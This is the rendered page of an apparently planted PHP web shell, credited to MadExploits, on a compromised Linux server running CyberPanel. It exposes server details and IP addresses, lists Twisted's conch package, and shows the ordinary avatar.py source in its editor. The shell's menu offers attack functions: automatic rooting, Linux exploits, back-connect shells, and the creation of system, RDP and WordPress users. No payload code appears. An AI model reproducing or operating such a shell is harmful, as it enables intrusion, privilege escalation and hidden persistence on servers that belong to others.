Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
conch /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
insults
[ DIR ]
drwxr-xr-x
openssh_compat
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
__init__.py
198
B
-rw-r--r--
avatar.py
1.6
KB
-rw-r--r--
checkers.py
18.97
KB
-rw-r--r--
endpoints.py
29.26
KB
-rw-r--r--
error.py
2.6
KB
-rw-r--r--
interfaces.py
14.57
KB
-rw-r--r--
ls.py
2.63
KB
-rw-r--r--
manhole.py
11.57
KB
-rw-r--r--
manhole_ssh.py
4.32
KB
-rw-r--r--
manhole_tap.py
5.36
KB
-rw-r--r--
mixin.py
1.34
KB
-rw-r--r--
recvline.py
18.71
KB
-rw-r--r--
stdio.py
2.71
KB
-rw-r--r--
tap.py
3.12
KB
-rw-r--r--
telnet.py
37.16
KB
-rw-r--r--
ttymodes.py
2.14
KB
-rw-r--r--
unix.py
16.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : avatar.py
# -*- test-case-name: twisted.conch.test.test_conch -*- from zope.interface import implementer from twisted.conch.error import ConchError from twisted.conch.interfaces import IConchUser from twisted.conch.ssh.connection import OPEN_UNKNOWN_CHANNEL_TYPE from twisted.logger import Logger from twisted.python.compat import nativeString @implementer(IConchUser) class ConchUser: _log = Logger() def __init__(self): self.channelLookup = {} self.subsystemLookup = {} @property def conn(self): return self._conn @conn.setter def conn(self, value): self._conn = value def lookupChannel(self, channelType, windowSize, maxPacket, data): klass = self.channelLookup.get(channelType, None) if not klass: raise ConchError(OPEN_UNKNOWN_CHANNEL_TYPE, "unknown channel") else: return klass( remoteWindow=windowSize, remoteMaxPacket=maxPacket, data=data, avatar=self, ) def lookupSubsystem(self, subsystem, data): self._log.debug( "Subsystem lookup: {subsystem!r}", subsystem=self.subsystemLookup ) klass = self.subsystemLookup.get(subsystem, None) if not klass: return False return klass(data, avatar=self) def gotGlobalRequest(self, requestType, data): # XXX should this use method dispatch? requestType = nativeString(requestType.replace(b"-", b"_")) f = getattr(self, "global_%s" % requestType, None) if not f: return 0 return f(data)
Close